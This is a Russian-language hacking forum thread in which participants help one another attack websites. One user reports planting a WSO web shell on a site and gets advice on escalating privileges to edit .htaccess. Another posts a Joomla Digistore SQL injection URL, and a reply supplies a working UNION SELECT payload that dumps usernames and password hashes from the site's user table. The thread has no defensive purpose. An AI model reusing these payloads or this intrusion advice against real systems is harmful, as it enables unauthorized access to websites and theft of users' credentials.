 |
|
23.04.2012, 19:09
|
|
Участник форума
Регистрация: 08.01.2010
Сообщений: 155
Провел на форуме:
1008872
Репутация:
22
|
|
залил wso шелл на сайт. пытаюсь редактировать .htacess, а мне пишет File isn't writeable
права на файл стоят 0644 и они не меняются. скажите, как можно изменить права на файл или как отредактировать файл?
|
|
|
23.04.2012, 19:19
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
Провел на форуме:
103014
Репутация:
76
|
|
Сообщение от skagen
залил wso шелл на сайт. пытаюсь редактировать .htacess, а мне пишет File isn't writeable
права на файл стоят 0644 и они не меняются. скажите, как можно изменить права на файл или как отредактировать файл?
Сменить овнера файла на того, который может выставить нужные права для редактирования файла. Очевидно же. На практике это означает, что нужно повысить свои права, которыx у вас не хватает для вышеперечисленных операций. Ответ на вопрос: "Что тогда делать?" напрашивается сам собой.
|
|
|
|
23.04.2012, 19:20
|
|
Участник форума
Регистрация: 02.07.2010
Сообщений: 140
Провел на форуме:
36102
Репутация:
0
|
|
Сообщение от skagen
залил wso шелл на сайт. пытаюсь редактировать .htacess, а мне пишет File isn't writeable
права на файл стоят 0644 и они не меняются. скажите, как можно изменить права на файл или как отредактировать файл?
Если в папке есть права - удали файл и создай заного
|
|
|
|
23.04.2012, 21:04
|
|
Новичок
Регистрация: 01.04.2011
Сообщений: 13
Провел на форуме:
2616
Репутация:
0
|
|
уязвимость (SQL inj) Joomla в компоненте Digistore
http://www.exploitsdownload.com/exploit/na/joomla-digistore-sql-injection
http://joomla15.ijoomlademo.com/index.php?option=com_digistore&controller=digi storeProducts&task=list&cid[]=-2/**/union/**/select/**/user(),user(),user(),version(),user(),user()
Объясните пожалуйста, при помощи этой уязвимости реально слить хэши и ники из основной БД сайта?
|
|
|
|
23.04.2012, 21:19
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
а в чем проблема?
Код:
http://joomla15.ijoomlademo.com/index.php?option=com_digistore&controller=digistor%20eProducts&task=list&cid[]=-2/**/union/**/select/**/group_concat%28username,0x3a,password%29,2,3,4/**/from/**/j17w2hcpwjzo5__users
|
|
|
|
23.04.2012, 21:30
|
|
Новичок
Регистрация: 01.04.2011
Сообщений: 13
Провел на форуме:
2616
Репутация:
0
|
|
Сообщение от Seravin
а в чем проблема?
Код:
http://joomla15.ijoomlademo.com/index.php?option=com_digistore&controller=digistor%20eProducts&task=list&cid[]=-2/**/union/**/select/**/group_concat%28username,0x3a,password%29,2,3,4/**/from/**/j17w2hcpwjzo5__users
Я бы был невероятно признателен Вам, если бы разъяснили в чём соль. Просто в прошлый раз когда я получал пароли на локалхосте (самописный двиг с детской уязвимостью), все хэши выпадали в ошибку, а тут даже в исходном коде нет намёков. Извините если напрягаю
|
|
|
|
23.04.2012, 21:44
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
как минимум то, что у тебя 6 полей было, а у меня 4
|
|
|
|
23.04.2012, 21:49
|
|
Участник форума
Регистрация: 08.01.2010
Сообщений: 155
Провел на форуме:
1008872
Репутация:
22
|
|
Сообщение от Га-Ноцри
Сменить овнера файла на того, который может выставить нужные права для редактирования файла. Очевидно же. На практике это означает, что нужно повысить свои права, которыx у вас не хватает для вышеперечисленных операций. Ответ на вопрос: "Что тогда делать?" напрашивается сам собой.
и каким образом сменить владельца то или повысить свои права?
|
|
|
|
23.04.2012, 22:38
|
|
Новичок
Регистрация: 01.04.2011
Сообщений: 13
Провел на форуме:
2616
Репутация:
0
|
|
Сообщение от Seravin
как минимум то, что у тебя 6 полей было, а у меня 4
ну а дела то в конечном итоге не меняет
|
|
|
|
23.04.2012, 23:57
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от None
ну а дела то в конечном итоге не меняет
как это так «дела не меняет?».
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
